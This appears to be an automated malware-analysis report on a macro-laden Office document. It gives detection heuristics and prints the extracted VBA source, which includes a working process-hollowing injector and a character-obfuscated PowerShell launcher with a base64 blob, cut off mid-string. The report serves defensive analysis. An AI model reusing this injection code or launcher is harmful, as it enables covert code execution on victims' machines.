MALICIOUS (Risk Score: 452)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The macros utilize Windows API calls such as CreateProcess, VirtualAlloc, and WriteProcessMemory, indicating an attempt to execute arbitrary code. Specifically, the 'Document_Open' macro and references to PowerShell and cmd.exe suggest the script is designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Pwshell-10001336-0' further supports this conclusion.
Heuristics (14)
- ClamAV: Doc.Downloader.Pwshell-10001336-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
- Reference to WriteProcessMemory API [critical, SC_STR_WRITEPROCESSMEMORY]: Reference to WriteProcessMemory API
- VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]: Document contains VBA macro code
- PowerShell reference in VBA [critical, OLE_VBA_PS]: PowerShell reference in VBA. Matched lines in script:
  'strSrcFile = "C:\Windows\System32\cmd.exe"
  strSrcFile = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call. Matched lines in script:
  For i = 0 To 2
  Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
  Set colProcess = objWMIService.ExecQuery("Select * from Win32_Process WHERE Name = ""WINWORD.EXE"" AND CommandLine Like ""%win%"" ")
- cmd.exe reference in VBA [high, OLE_VBA_CMD]: cmd.exe reference in VBA. Matched lines in script:
  ' Arguments: strFilename - Fullname of the file as a String (ex:
  ' 'C:\Windows\System32\cmd.exe')
  ' Returns: The content of the file as a Byte array
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro. Matched lines in script:
  End Sub
  Private Sub Document_open()
- Reference to CreateProcess API [high, SC_STR_CREATEPROCESS]: Reference to CreateProcess API
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- NOP-equivalent sled detected [medium, SC_NOP_EQUIV_SLED]: Long run of 0x40 bytes
Disassembly (attempted x86 opcode disassembly; 0x40 decodes as the single-byte instruction inc eax)
  00020D3B .. 00020D76  40            inc eax   (60 consecutive single-byte 0x40 instructions, one per address)
  00020D77  41            inc ecx
  00020D78  cafdb2        retf 0xb2fd
  00020D7B  f8            clc
  00020D7C  57            push edi
  00020D7D  c410          les edx, ptr [eax]
  00020D7F  5b            pop ebx
  00020D80  ed            in eax, dx
  00020D81  6f            outsd dx, dword ptr [esi]
  00020D82  ab            stosd dword ptr es:[edi], eax
  00020D83  188f795bfb93  sbb byte ptr [edi - 0x6c04a487], cl
  00020D89  50            push eax
  00020D8A  59            pop ecx
  00020D8B  a020202020    mov al, byte ptr [0x20202020]
  00020D90  2020          and byte ptr [eax], ah
  00020D92  2020          and byte ptr [eax], ah
  00020D94  2020          and byte ptr [eax], ah
  00020D96  2020          and byte ptr [eax], ah
  00020D98  2020          and byte ptr [eax], ah
  00020D9A  20            .byte 0x20
- Reference to VirtualAlloc API [medium, SC_STR_VIRTUALALLOC]: Reference to VirtualAlloc API
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://purl.org/dc/elements/1.1/
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
  - https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
  - https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx
  - https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx
  - https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx
  - https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx
  - https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html
  - https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx
  - https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx
  - https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.html
  - https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspx
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 7d5e7e37fd7102147f85f18dc625705dd30f915b0416e8da4f2c44cc45cf207b) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 66353 bytes |

Detection for macros.bas:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 6 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Const IMAGE_SIZEOF_SHORT_NAME = 8
Private Const MAXIMUM_SUPPORTED_EXTENSION = 512
Private Const SIZE_OF_80387_REGISTERS = 80
#If Win64 Then
Private Type M128A
Low As LongLong
High As LongLong
End Type
#End If
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(4 - 1) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(10 - 1) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_OPTIONAL_HEADER
#If Win64 Then
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUninitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
ImageBase As LongLong
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Win32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As LongLong
SizeOfStackCommit As LongLong
SizeOfHeapReserve As LongLong
SizeOfHeapCommit As LongLong
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
#Else
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUninitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Win32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
#End If
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_SECTION_HEADER
SecName(IMAGE_SIZEOF_SHORT_NAME - 1) As Byte
Misc As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As LongPtr
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte
Spare0 As Long
End Type
Private Type CONTEXT
#If Win64 Then
P1Home As LongLong
P2Home As LongLong
P3Home As LongLong
P4Home As LongLong
P5Home As LongLong
P6Home As LongLong
ContextFlags As Long
MxCsr As Long
SegCs As Integer
SegDs As Integer
SegEs As Integer
SegFs As Integer
SegGs As Integer
SegSs As Integer
EFlags As Long
Dr0 As LongLong
Dr1 As LongLong
Dr2 As LongLong
Dr3 As LongLong
Dr6 As LongLong
Dr7 As LongLong
Rax As LongLong
Rcx As LongLong
Rdx As LongLong
Rbx As LongLong
Rsp As LongLong
Rbp As LongLong
Rsi As LongLong
Rdi As LongLong
R8 As LongLong
R9 As LongLong
R10 As LongLong
R11 As LongLong
R12 As LongLong
R13 As LongLong
R14 As LongLong
R15 As LongLong
Rip As LongLong
Header(2 - 1) As M128A
Legacy(8 - 1) As M128A
Xmm0 As M128A
Xmm1 As M128A
Xmm2 As M128A
Xmm3 As M128A
Xmm4 As M128A
Xmm5 As M128A
Xmm6 As M128A
Xmm7 As M128A
Xmm8 As M128A
Xmm9 As M128A
Xmm10 As M128A
Xmm11 As M128A
Xmm12 As M128A
Xmm13 As M128A
Xmm14 As M128A
Xmm15 As M128A
VectorRegister(26 - 1) As M128A
VectorControl As LongLong
DebugControl As LongLong
LastBranchToRip As LongLong
LastBranchFromRip As LongLong
LastExceptionToRip As LongLong
LastExceptionFromRip As LongLong
#Else
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
ExtendedRegisters(MAXIMUM_SUPPORTED_EXTENSION - 1) As Byte
#End If
End Type
Private Const MEM_COMMIT = &H1000
Private Const MEM_RESERVE = &H2000
Private Const PAGE_READWRITE = &H4
Private Const PAGE_EXECUTE_READWRITE = &H40
Private Const MAX_PATH = 260
Private Const CREATE_SUSPENDED = &H4
Private Const CONTEXT_FULL = &H10007
Private Const IMAGE_DOS_SIGNATURE = &H5A4D
Private Const IMAGE_NT_SIGNATURE = &H4550
Private Const IMAGE_FILE_MACHINE_I386 = &H14C
Private Const IMAGE_FILE_MACHINE_AMD64 = &H8664
Private Const SIZEOF_IMAGE_SECTION_HEADER = 40
#If Win64 Then
Private Const SIZEOF_IMAGE_NT_HEADERS = 264
Private Const SIZEOF_ADDRESS = 8
#Else
Private Const SIZEOF_IMAGE_NT_HEADERS = 248
Private Const SIZEOF_ADDRESS = 4
#End If
Public Function ByteArrayLength(baBytes() As Byte) As Long
On Error Resume Next
ByteArrayLength = UBound(baBytes) - LBound(baBytes) + 1
End Function
Private Function ByteArrayToString(baBytes() As Byte) As String
Dim strRes As String: strRes = ""
Dim iCount As Integer
For iCount = 0 To ByteArrayLength(baBytes) - 1
If baBytes(iCount) <> 0 Then
strRes = strRes & Chr(baBytes(iCount))
Else
Exit For
End If
Next iCount
ByteArrayToString = strRes
End Function
Private Function FileToByteArray(strFilename As String) As Byte()
Dim strFileContent As String
Dim iFile As Integer: iFile = FreeFile
Open strFilename For Binary Access Read As #iFile
strFileContent = Space(FileLen(strFilename))
Get #iFile, , strFileContent
Close #iFile
Dim baFileContent() As Byte
baFileContent = StrConv(strFileContent, vbFromUnicode)
FileToByteArray = baFileContent
End Function
Private Function StringToByteArray(strContent As String) As Byte()
Dim baContent() As Byte
baContent = StrConv(strContent, vbFromUnicode)
StringToByteArray = baContent
End Function
Private Function A(strA As String, bChar As Byte) As String
A = strA & Chr(bChar)
End Function
Private Function B(strA As String, strB As String) As String
B = strA + strB
End Function
Private Function PE() As String
Dim gkjfsgksjkasoiopfajvd As String
gkjfsgksjkasoiopfajvd = ""
PE = gkjfsgksjkasoiopfajvd
End Function
Public Sub sgsdkjabjkajhabvjkhabvlkadnkjanvkjabv(ByRef baImage() As Byte, strArguments As String)
Dim structDOSHeader As IMAGE_DOS_HEADER
Dim ptrDOSHeader As LongPtr: ptrDOSHeader = VarPtr(structDOSHeader)
Call RtlMoveMemory(ptrDOSHeader, VarPtr(baImage(0)), 64)
Dim j As Integer
If structDOSHeader.e_magic = IMAGE_DOS_SIGNATURE Then
Else
Exit Sub
End If
Dim structNTHeaders As IMAGE_NT_HEADERS
Dim ptrNTHeaders As LongPtr: ptrNTHeaders = VarPtr(structNTHeaders)
Call RtlMoveMemory(ptrNTHeaders, VarPtr(baImage(structDOSHeader.e_lfanew)), SIZEOF_IMAGE_NT_HEADERS)
If structNTHeaders.Signature = IMAGE_NT_SIGNATURE Then
Else
Exit Sub
End If
#If Win64 Then
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_I386 Then
Exit Sub
End If
#Else
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_AMD64 Then
Exit Sub
End If
#End If
Dim strCurrentFilePath As String
strCurrentFilePath = Space(MAX_PATH)
Dim lGetModuleFileName As Long
lGetModuleFileName = GetModuleFileName(0, strCurrentFilePath, MAX_PATH)
strCurrentFilePath = Left(strCurrentFilePath, InStr(strCurrentFilePath, vbNullChar) - 1)
Dim strNull As String
Dim structProcessInformation As PROCESS_INFORMATION
Dim structStartupInfo As STARTUPINFO
Dim lCreateProcess As Long
For j = 0 To 1999
Next j
lCreateProcess = CreateProcess(strNull, strCurrentFilePath + " " + strArguments, 0&, 0&, False, CREATE_SUSPENDED, 0&, strNull, structStartupInfo, structProcessInformation)
If lCreateProcess = 0 Then
Exit Sub
Else
End If
Dim structContext As CONTEXT
structContext.ContextFlags = CONTEXT_FULL
Dim lGetThreadContext As Long
For j = 0 To 1999
Next j
lGetThreadContext = GetThreadContext(structProcessInformation.hThread, structContext)
If lGetThreadContext = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lImageBase As LongPtr
#If Win64 Then
Dim lImageBaseAddrLocation As LongPtr: lImageBaseAddrLocation = structContext.Rdx + 16
#Else
Dim lImageBaseAddrLocation As LongPtr: lImageBaseAddrLocation = structContext.Ebx + 8
#End If
Dim ptrImageBase As LongPtr: ptrImageBase = VarPtr(lImageBase)
Dim lReadProcessMemory As Long
lReadProcessMemory = ReadProcessMemory(structProcessInformation.hProcess, lImageBaseAddrLocation, ptrImageBase, SIZEOF_ADDRESS, 0)
If lReadProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lProcessImageBase As LongPtr
lProcessImageBase = VirtualAllocEx(structProcessInformation.hProcess, structNTHeaders.OptionalHeader.ImageBase, structNTHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE)
If lProcessImageBase = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lWriteProcessMemory As Long
For j = 0 To 1999
Next j
lWriteProcessMemory = WriteProcessMemory(structProcessInformation.hProcess, lProcessImageBase, VarPtr(baImage(0)), structNTHeaders.OptionalHeader.SizeOfHeaders, 0&)
If lWriteProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim iCount As Integer
Dim structSectionHeader As IMAGE_SECTION_HEADER
Dim ptrSectionHeader As LongPtr: ptrSectionHeader = VarPtr(structSectionHeader)
For iCount = 0 To structNTHeaders.FileHeader.NumberOfSections - 1
Call RtlMoveMemory(ptrSectionHeader, VarPtr(baImage(structDOSHeader.e_lfanew + SIZEOF_IMAGE_NT_HEADERS + (iCount * SIZEOF_IMAGE_SECTION_HEADER))), SIZEOF_IMAGE_SECTION_HEADER)
Dim strSectionName As String: strSectionName = ByteArrayToString(structSectionHeader.SecName)
Dim lNewAddress As LongPtr: lNewAddress = lProcessImageBase + structSectionHeader.VirtualAddress
Dim lSize As Long: lSize = structSectionHeader.SizeOfRawData
lWriteProcessMemory = WriteProcessMemory(structProcessInformation.hProcess, lNewAddress, VarPtr(baImage(0 + structSectionHeader.PointerToRawData)), lSize, 0&)
If lWriteProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Next iCount
#If Win64 Then
Dim lAddrLocation As LongPtr: lAddrLocation = structContext.Rdx + 16
#Else
Dim lAddrLocation As LongPtr: lAddrLocation = structContext.Ebx + 8
#End If
For j = 0 To 1999
Next j
lWriteProcessMemory = WriteProcessMemory(structProcessInformation.hProcess, lAddrLocation, VarPtr(structNTHeaders.OptionalHeader.ImageBase), SIZEOF_ADDRESS, 0&)
If lWriteProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lEntryPoint As LongPtr: lEntryPoint = lProcessImageBase + structNTHeaders.OptionalHeader.AddressOfEntryPoint
#If Win64 Then
structContext.Rcx = lEntryPoint
#Else
structContext.Eax = lEntryPoint
#End If
Dim lSetThreadContext As Long
lSetThreadContext = SetThreadContext(structProcessInformation.hThread, structContext)
If lSetThreadContext = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
Debug.Print ("[+] |__ Applied context to the new thread")
End If
Dim lResumeThread As Long
lResumeThread = ResumeThread(structProcessInformation.hThread)
If lResumeThread = 1 Then
Else
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
End If
End Sub
Private Sub Document_close()
Dim gkjfsgksjkasoiopfajvd As String
Dim baFileContent() As Byte
Dim A As Boolean
Dim Fkjhdksjjgjksv As String
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(67)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(58)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(87)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(105)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(110)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(100)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(83)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(121)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(116)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(109)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(51)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(50)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(87)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(105)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(110)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(100)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(80)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(114)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(83)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(104)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(118)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(49)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(46)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(48)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(112)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(114)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(104)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(46)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(120)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Dim HJNLksdjbjksvajklvnhjksdnjks As String
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(45)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(119)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(105)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(110)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(100)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(32)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(48)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(48)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(49)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(32)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(45)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(101)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(110)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(99)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(111)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(32)
Dim zHdj As String
Dim zHdj1 As String
Dim zHdj2 As String
Dim zHdj3 As String
Dim zHdj4 As String
Dim zHdj5 As String
Dim zHdj6 As String
Dim zHdj7 As String
zHdj = "UwBlAHQALQBBAGwAaQBhAHMAIABzAHcAIAAtAFYAYQBsAHUAZQAgACIASQBuAFYAbwBrAGUALQBlAFgAcAByAGUAUwBzAEkAbwBuACIAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AG"
